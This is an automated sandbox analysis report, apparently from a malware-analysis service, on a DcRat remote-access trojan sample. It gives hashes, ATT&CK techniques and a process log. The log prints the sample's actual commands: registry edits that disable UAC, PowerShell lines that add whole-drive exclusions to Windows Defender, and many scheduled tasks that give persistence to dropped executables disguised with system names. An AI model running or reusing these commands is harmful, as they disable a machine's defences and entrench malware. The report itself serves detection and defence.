dcrat | 8fb6ada4913777c02d68c945590916490da636dd5970542be792737e32a2a64a

Analysis

max time kernel
149s
max time network
153s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
15-10-2022 12:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

42d2f3d3157c790b31a09a0ca173feae.exe
Size

4.9MB
MD5

42d2f3d3157c790b31a09a0ca173feae
SHA1

a7694973c9dff0f3d624a9c00d2f36dcf9455b10
SHA256

8fb6ada4913777c02d68c945590916490da636dd5970542be792737e32a2a64a
SHA512

b7fea8abe3de9864acaaafae14932695db452607e7fd76542fb1093bfbbf897f86693d7ea207706b952081ff92d05b177d0d224ce4cdf33302b8424dfaa93d90
SSDEEP

49152:Dl5MTGChZpxtlBBgxchXb/zqP6DUtRgs5q289dAnSz44hnW1XgnYu6fYmPkMSx8E:

Score

10^/10

dcrat evasion infostealer rat trojan

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Process spawned unexpected child process 36 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	868	1008	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	472	1008	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1924	1008	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	832	1008	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1276	1008	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	288	1008	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1764	1008	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	284	1008	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	872	1008	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1880	1008	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1468	1008	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	836	1008	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1352	1008	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	840	1008	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1072	1008	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	552	1008	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	800	1008	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1584	1008	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1612	1008	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1964	1008	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2028	1008	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	524	1008	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1012	1008	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1364	1008	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1200	1008	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	692	1008	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1500	1008	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1660	1008	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1880	1008	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1976	1008	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1276	1008	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1172	1008	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1396	1008	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	440	1008	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1812	1008	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1756	1008	schtasks.exe

UAC bypass 3 TTPs 6 IoCs

evasion trojan

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

42d2f3d3157c790b31a09a0ca173feae.exeservices.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	42d2f3d3157c790b31a09a0ca173feae.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	42d2f3d3157c790b31a09a0ca173feae.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	42d2f3d3157c790b31a09a0ca173feae.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	services.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	services.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	services.exe

DCRat payload 1 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
behavioral1/memory/1784-55-0x000000001B3C0000-0x000000001B4EE000-memory.dmp	dcrat

Executes dropped EXE 1 IoCs

Processes:

services.exe

pid process

2352 services.exe

pid	process
2352	services.exe

Checks whether UAC is enabled 1 TTPs 4 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

42d2f3d3157c790b31a09a0ca173feae.exeservices.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	42d2f3d3157c790b31a09a0ca173feae.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	42d2f3d3157c790b31a09a0ca173feae.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	services.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	services.exe

Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

7 ipinfo.io
8 ipinfo.io

flow	ioc
7	ipinfo.io
8	ipinfo.io

Drops file in Program Files directory 20 IoCs

Processes:

42d2f3d3157c790b31a09a0ca173feae.exe

description	ioc	process
File created	C:\Program Files\VideoLAN\VLC\6cb0b6c459d5d3	42d2f3d3157c790b31a09a0ca173feae.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\6ccacd8608530f	42d2f3d3157c790b31a09a0ca173feae.exe
File created	C:\Program Files (x86)\Windows Defender\it-IT\csrss.exe	42d2f3d3157c790b31a09a0ca173feae.exe
File opened for modification	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\Idle.exe	42d2f3d3157c790b31a09a0ca173feae.exe
File opened for modification	C:\Program Files (x86)\Uninstall Information\RCX64C9.tmp	42d2f3d3157c790b31a09a0ca173feae.exe
File opened for modification	C:\Program Files (x86)\Uninstall Information\smss.exe	42d2f3d3157c790b31a09a0ca173feae.exe
File created	C:\Program Files\VideoLAN\VLC\dwm.exe	42d2f3d3157c790b31a09a0ca173feae.exe
File created	C:\Program Files (x86)\Uninstall Information\69ddcba757bf72	42d2f3d3157c790b31a09a0ca173feae.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\RCXFCC.tmp	42d2f3d3157c790b31a09a0ca173feae.exe
File opened for modification	C:\Program Files\Windows NT\Accessories\ja-JP\RCX20DE.tmp	42d2f3d3157c790b31a09a0ca173feae.exe
File opened for modification	C:\Program Files\Windows NT\Accessories\ja-JP\wininit.exe	42d2f3d3157c790b31a09a0ca173feae.exe
File opened for modification	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\RCX42C4.tmp	42d2f3d3157c790b31a09a0ca173feae.exe
File created	C:\Program Files\Windows NT\Accessories\ja-JP\56085415360792	42d2f3d3157c790b31a09a0ca173feae.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\RCX5C4F.tmp	42d2f3d3157c790b31a09a0ca173feae.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\csrss.exe	42d2f3d3157c790b31a09a0ca173feae.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\dwm.exe	42d2f3d3157c790b31a09a0ca173feae.exe
File created	C:\Program Files\Windows NT\Accessories\ja-JP\wininit.exe	42d2f3d3157c790b31a09a0ca173feae.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\Idle.exe	42d2f3d3157c790b31a09a0ca173feae.exe
File created	C:\Program Files (x86)\Windows Defender\it-IT\886983d96e3d3e	42d2f3d3157c790b31a09a0ca173feae.exe
File created	C:\Program Files (x86)\Uninstall Information\smss.exe	42d2f3d3157c790b31a09a0ca173feae.exe

Drops file in Windows directory 4 IoCs

Processes:

42d2f3d3157c790b31a09a0ca173feae.exe

description	ioc	process
File created	C:\Windows\L2Schemas\lsass.exe	42d2f3d3157c790b31a09a0ca173feae.exe
File created	C:\Windows\L2Schemas\6203df4a6bafc7	42d2f3d3157c790b31a09a0ca173feae.exe
File opened for modification	C:\Windows\L2Schemas\RCX4B3D.tmp	42d2f3d3157c790b31a09a0ca173feae.exe
File opened for modification	C:\Windows\L2Schemas\lsass.exe	42d2f3d3157c790b31a09a0ca173feae.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 36 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

pid	process
1924	schtasks.exe
1764	schtasks.exe
552	schtasks.exe
2028	schtasks.exe
692	schtasks.exe
1756	schtasks.exe
1012	schtasks.exe
868	schtasks.exe
524	schtasks.exe
1976	schtasks.exe
1396	schtasks.exe
1880	schtasks.exe
840	schtasks.exe
1612	schtasks.exe
1072	schtasks.exe
1964	schtasks.exe
1276	schtasks.exe
1172	schtasks.exe
1812	schtasks.exe
472	schtasks.exe
832	schtasks.exe
288	schtasks.exe
872	schtasks.exe
1468	schtasks.exe
1352	schtasks.exe
800	schtasks.exe
1364	schtasks.exe
1880	schtasks.exe
1584	schtasks.exe
1200	schtasks.exe
1500	schtasks.exe
1276	schtasks.exe
284	schtasks.exe
836	schtasks.exe
1660	schtasks.exe
440	schtasks.exe

Suspicious behavior: EnumeratesProcesses 23 IoCs

Processes:

42d2f3d3157c790b31a09a0ca173feae.exeservices.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1784	42d2f3d3157c790b31a09a0ca173feae.exe
2352	services.exe
1884	powershell.exe
1316	powershell.exe
1752	powershell.exe
1012	powershell.exe
1396	powershell.exe
1868	powershell.exe
1896	powershell.exe
1716	powershell.exe
1104	powershell.exe
800	powershell.exe
1968	powershell.exe
1068	powershell.exe
2352	services.exe
2352	services.exe
2352	services.exe
2352	services.exe
2352	services.exe
2352	services.exe
2352	services.exe
2352	services.exe
2352	services.exe

Suspicious use of AdjustPrivilegeToken 14 IoCs

Processes:

description	pid	process
Token: SeDebugPrivilege	1784	42d2f3d3157c790b31a09a0ca173feae.exe
Token: SeDebugPrivilege	2352	services.exe
Token: SeDebugPrivilege	1884	powershell.exe
Token: SeDebugPrivilege	1316	powershell.exe
Token: SeDebugPrivilege	1752	powershell.exe
Token: SeDebugPrivilege	1012	powershell.exe
Token: SeDebugPrivilege	1396	powershell.exe
Token: SeDebugPrivilege	1868	powershell.exe
Token: SeDebugPrivilege	1896	powershell.exe
Token: SeDebugPrivilege	1716	powershell.exe
Token: SeDebugPrivilege	1104	powershell.exe
Token: SeDebugPrivilege	800	powershell.exe
Token: SeDebugPrivilege	1968	powershell.exe
Token: SeDebugPrivilege	1068	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

services.exe

pid process

2352 services.exe

pid	process
2352	services.exe

Suspicious use of WriteProcessMemory 51 IoCs

Processes:

42d2f3d3157c790b31a09a0ca173feae.execmd.exeservices.exe

description	pid	process	target process
PID 1784 wrote to memory of 1868	1784	42d2f3d3157c790b31a09a0ca173feae.exe	powershell.exe
PID 1784 wrote to memory of 1868	1784	42d2f3d3157c790b31a09a0ca173feae.exe	powershell.exe
PID 1784 wrote to memory of 1868	1784	42d2f3d3157c790b31a09a0ca173feae.exe	powershell.exe
PID 1784 wrote to memory of 1068	1784	42d2f3d3157c790b31a09a0ca173feae.exe	powershell.exe
PID 1784 wrote to memory of 1068	1784	42d2f3d3157c790b31a09a0ca173feae.exe	powershell.exe
PID 1784 wrote to memory of 1068	1784	42d2f3d3157c790b31a09a0ca173feae.exe	powershell.exe
PID 1784 wrote to memory of 1716	1784	42d2f3d3157c790b31a09a0ca173feae.exe	powershell.exe
PID 1784 wrote to memory of 1716	1784	42d2f3d3157c790b31a09a0ca173feae.exe	powershell.exe
PID 1784 wrote to memory of 1716	1784	42d2f3d3157c790b31a09a0ca173feae.exe	powershell.exe
PID 1784 wrote to memory of 1884	1784	42d2f3d3157c790b31a09a0ca173feae.exe	powershell.exe
PID 1784 wrote to memory of 1884	1784	42d2f3d3157c790b31a09a0ca173feae.exe	powershell.exe
PID 1784 wrote to memory of 1884	1784	42d2f3d3157c790b31a09a0ca173feae.exe	powershell.exe
PID 1784 wrote to memory of 1316	1784	42d2f3d3157c790b31a09a0ca173feae.exe	powershell.exe
PID 1784 wrote to memory of 1316	1784	42d2f3d3157c790b31a09a0ca173feae.exe	powershell.exe
PID 1784 wrote to memory of 1316	1784	42d2f3d3157c790b31a09a0ca173feae.exe	powershell.exe
PID 1784 wrote to memory of 1896	1784	42d2f3d3157c790b31a09a0ca173feae.exe	powershell.exe
PID 1784 wrote to memory of 1896	1784	42d2f3d3157c790b31a09a0ca173feae.exe	powershell.exe
PID 1784 wrote to memory of 1896	1784	42d2f3d3157c790b31a09a0ca173feae.exe	powershell.exe
PID 1784 wrote to memory of 1012	1784	42d2f3d3157c790b31a09a0ca173feae.exe	powershell.exe
PID 1784 wrote to memory of 1012	1784	42d2f3d3157c790b31a09a0ca173feae.exe	powershell.exe
PID 1784 wrote to memory of 1012	1784	42d2f3d3157c790b31a09a0ca173feae.exe	powershell.exe
PID 1784 wrote to memory of 1104	1784	42d2f3d3157c790b31a09a0ca173feae.exe	powershell.exe
PID 1784 wrote to memory of 1104	1784	42d2f3d3157c790b31a09a0ca173feae.exe	powershell.exe
PID 1784 wrote to memory of 1104	1784	42d2f3d3157c790b31a09a0ca173feae.exe	powershell.exe
PID 1784 wrote to memory of 800	1784	42d2f3d3157c790b31a09a0ca173feae.exe	powershell.exe
PID 1784 wrote to memory of 800	1784	42d2f3d3157c790b31a09a0ca173feae.exe	powershell.exe
PID 1784 wrote to memory of 800	1784	42d2f3d3157c790b31a09a0ca173feae.exe	powershell.exe
PID 1784 wrote to memory of 1396	1784	42d2f3d3157c790b31a09a0ca173feae.exe	powershell.exe
PID 1784 wrote to memory of 1396	1784	42d2f3d3157c790b31a09a0ca173feae.exe	powershell.exe
PID 1784 wrote to memory of 1396	1784	42d2f3d3157c790b31a09a0ca173feae.exe	powershell.exe
PID 1784 wrote to memory of 1968	1784	42d2f3d3157c790b31a09a0ca173feae.exe	powershell.exe
PID 1784 wrote to memory of 1968	1784	42d2f3d3157c790b31a09a0ca173feae.exe	powershell.exe
PID 1784 wrote to memory of 1968	1784	42d2f3d3157c790b31a09a0ca173feae.exe	powershell.exe
PID 1784 wrote to memory of 1752	1784	42d2f3d3157c790b31a09a0ca173feae.exe	powershell.exe
PID 1784 wrote to memory of 1752	1784	42d2f3d3157c790b31a09a0ca173feae.exe	powershell.exe
PID 1784 wrote to memory of 1752	1784	42d2f3d3157c790b31a09a0ca173feae.exe	powershell.exe
PID 1784 wrote to memory of 2156	1784	42d2f3d3157c790b31a09a0ca173feae.exe	cmd.exe
PID 1784 wrote to memory of 2156	1784	42d2f3d3157c790b31a09a0ca173feae.exe	cmd.exe
PID 1784 wrote to memory of 2156	1784	42d2f3d3157c790b31a09a0ca173feae.exe	cmd.exe
PID 2156 wrote to memory of 2316	2156	cmd.exe	w32tm.exe
PID 2156 wrote to memory of 2316	2156	cmd.exe	w32tm.exe
PID 2156 wrote to memory of 2316	2156	cmd.exe	w32tm.exe
PID 2156 wrote to memory of 2352	2156	cmd.exe	services.exe
PID 2156 wrote to memory of 2352	2156	cmd.exe	services.exe
PID 2156 wrote to memory of 2352	2156	cmd.exe	services.exe
PID 2352 wrote to memory of 2748	2352	services.exe	WScript.exe
PID 2352 wrote to memory of 2748	2352	services.exe	WScript.exe
PID 2352 wrote to memory of 2748	2352	services.exe	WScript.exe
PID 2352 wrote to memory of 2780	2352	services.exe	WScript.exe
PID 2352 wrote to memory of 2780	2352	services.exe	WScript.exe
PID 2352 wrote to memory of 2780	2352	services.exe	WScript.exe

System policy modification 1 TTPs 6 IoCs

evasion

Modify Registry

T1112

Processes:

42d2f3d3157c790b31a09a0ca173feae.exeservices.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	42d2f3d3157c790b31a09a0ca173feae.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	42d2f3d3157c790b31a09a0ca173feae.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	services.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	services.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	services.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	42d2f3d3157c790b31a09a0ca173feae.exe

C:\Users\Admin\AppData\Local\Temp\42d2f3d3157c790b31a09a0ca173feae.exe
"C:\Users\Admin\AppData\Local\Temp\42d2f3d3157c790b31a09a0ca173feae.exe"
1⤵
- UAC bypass
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1784

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1868

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1068

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1716

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1884

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1316

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1896

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:800

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1396

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1968

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1752

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\G2343ZQH7U.bat"
2⤵
- Suspicious use of WriteProcessMemory
PID:2156

C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
3⤵
PID:2316

C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\services.exe
"C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\services.exe"
3⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2352

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9bf07259-c80c-4be0-9a06-b329d693b6ad.vbs"
4⤵
PID:2748

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c96e4307-03d1-4ea8-9b4c-96d3ec60315b.vbs"
4⤵
PID:2780

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1104

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1012

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 11 /tr "'C:\Program Files\VideoLAN\VLC\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:868

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files\VideoLAN\VLC\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:472

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 8 /tr "'C:\Program Files\VideoLAN\VLC\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1924

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\services.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:832

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1276

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:288

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows NT\Accessories\ja-JP\wininit.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1764

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files\Windows NT\Accessories\ja-JP\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:284

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows NT\Accessories\ja-JP\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:872

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WMIADAPW" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\WMIADAP.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1880

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WMIADAP" /sc ONLOGON /tr "'C:\Users\Default User\WMIADAP.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1468

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WMIADAPW" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\WMIADAP.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:836

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\Music\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1352

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Users\Admin\Music\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:840

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\Music\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1072

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 9 /tr "'C:\Users\Default\Local Settings\sppsvc.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:552

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Users\Default\Local Settings\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:800

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 5 /tr "'C:\Users\Default\Local Settings\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1584

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\Idle.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1612

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1964

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\Idle.exe'" /rl HIGHEST /f
1⤵
